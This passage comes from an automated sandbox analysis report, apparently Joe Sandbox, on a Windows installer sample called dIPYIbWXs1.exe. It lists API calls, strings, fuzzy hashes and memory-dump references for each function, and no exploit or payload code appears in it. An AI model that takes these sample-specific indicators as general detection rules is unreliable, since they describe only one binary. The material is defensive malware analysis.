                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                        • DeleteObject.GDI32(00000110), ref: 00404C81
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                          • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,?,00403FE0), ref: 004041BE
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                        • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                        • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                        • InvalidateRect.USER32(?,00000000,?), ref: 0040511B
                                                        • ShowWindow.USER32(?,00000000), ref: 00405169
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                        • ShowWindow.USER32(00000000), ref: 0040517B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                        • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                        • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                        • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                        • ShowWindow.USER32(?), ref: 00403D00
                                                        • DestroyWindow.USER32 ref: 00403D14
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                        • GetDlgItem.USER32(?,?), ref: 00403D51
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                        • GetDlgItem.USER32(?,?), ref: 00403E1A
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403E8F
                                                        • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                        • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                        • EnableWindow.USER32(?,?), ref: 00403F68
                                                        • EnableWindow.USER32(?,?), ref: 00403F83
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F99
                                                        • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                        • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403FB8
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                        • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                        • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                        • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID:
                                                        • API String ID: 184305955-0
                                                        • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                        • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                        • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                        • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404371
                                                        • GetDlgItem.USER32(00000000,?), ref: 00404385
                                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004043A3
                                                        • GetSysColor.USER32(?), ref: 004043B4
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                        • lstrlenA.KERNEL32(?), ref: 004043D5
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                        • SendMessageA.USER32(00000000), ref: 0040445E
                                                        • GetDlgItem.USER32(?,?), ref: 00404489
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                        • SetCursor.USER32(00000000), ref: 004044E1
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                        • SetCursor.USER32(00000000), ref: 004044FA
                                                        • SendMessageA.USER32(00000111,?,00000000), ref: 00404526
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: Call$N
                                                        • API String ID: 3103080414-3438112850
                                                        • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                        • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                        • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                        • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,telefaxe Setup,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F$telefaxe Setup
                                                        • API String ID: 941294808-1805730558
                                                        • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                        • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                        • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                        • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                        • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                        • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                        • wsprintfA.USER32 ref: 00405DDB
                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dIPYIbWXs1.exe,80000000,00000003), ref: 00405C94
                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %s=%s$[Rename]
                                                        • API String ID: 2171350718-1727408572
                                                        • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                        • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                        • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                        • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B2447
                                                          • Part of subcall function 6E4B1224: lstrcpynA.KERNEL32(00000000,?,6E4B12CF,-6E4B404B,6E4B11AB,-000000A0), ref: 6E4B1234
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E4B23C2
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6E4B23D7
                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E4B23E8
                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 6E4B23F6
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B23FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                        • String ID: @Hmu
                                                        • API String ID: 3730416702-887474944
                                                        • Opcode ID: e6646a0e0783784be388e15d43b21f8fc6f82cb9396bab5a1769a95d3e6a2f12
                                                        • Instruction ID: e4c3f644994162e694b225bc36f1c581b61f7de7e2e7d8fccd1f964508d2bdac
                                                        • Opcode Fuzzy Hash: e6646a0e0783784be388e15d43b21f8fc6f82cb9396bab5a1769a95d3e6a2f12
                                                        • Instruction Fuzzy Hash: 3641A971508701DFD7109FBA9844F6AB7E8FF46314F00482BE455DB680DBB099068BBA
                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dIPYIbWXs1.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\dIPYIbWXs1.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                        • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                        Strings
                                                        • *?|<>/":, xrefs: 0040641A
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                        • "C:\Users\user\Desktop\dIPYIbWXs1.exe", xrefs: 0040640E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\dIPYIbWXs1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-1701526867
                                                        • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                        • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                        • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                        • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                        APIs
                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DD5
                                                        • MulDiv.KERNEL32(000D71E2,00000064,000D8798), ref: 00402E00
                                                        • wsprintfA.USER32 ref: 00402E10
                                                        • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%$q
                                                        • API String ID: 1451636040-1501980237
                                                        • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                        • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                        • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                        • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                        • GetSysColor.USER32(00000000), ref: 0040423D
                                                        • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                        • SetBkMode.GDI32(?,?), ref: 00404255
                                                        • GetSysColor.USER32(?), ref: 00404268
                                                        • SetBkColor.GDI32(?,?), ref: 00404278
                                                        • DeleteObject.GDI32(?), ref: 00404292
                                                        • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                        • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                        • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                        APIs
                                                          • Part of subcall function 6E4B1215: GlobalAlloc.KERNELBASE(00000040,6E4B1233,?,6E4B12CF,-6E4B404B,6E4B11AB,-000000A0), ref: 6E4B121D
                                                        • GlobalFree.KERNEL32(?), ref: 6E4B25DE
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B2618
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 1a8623cf5b41e3db05bc55c6438561309658c724e58072da0d9518f0d6f2be99
                                                        • Instruction ID: 76d6cf64693e9c799c24e41d77703ccf84bba5ca9371bd7a30c62a82a9bafb16
                                                        • Opcode Fuzzy Hash: 1a8623cf5b41e3db05bc55c6438561309658c724e58072da0d9518f0d6f2be99
                                                        • Instruction Fuzzy Hash: 00419D72908601EFCB059FB9DC98D6B77BEEF8A304B00492EF50197210EB71A9059B76
                                                        APIs
                                                        • lstrlenA.KERNEL32(0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                        • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                        • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,74DF23A0), ref: 0040527A
                                                        • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
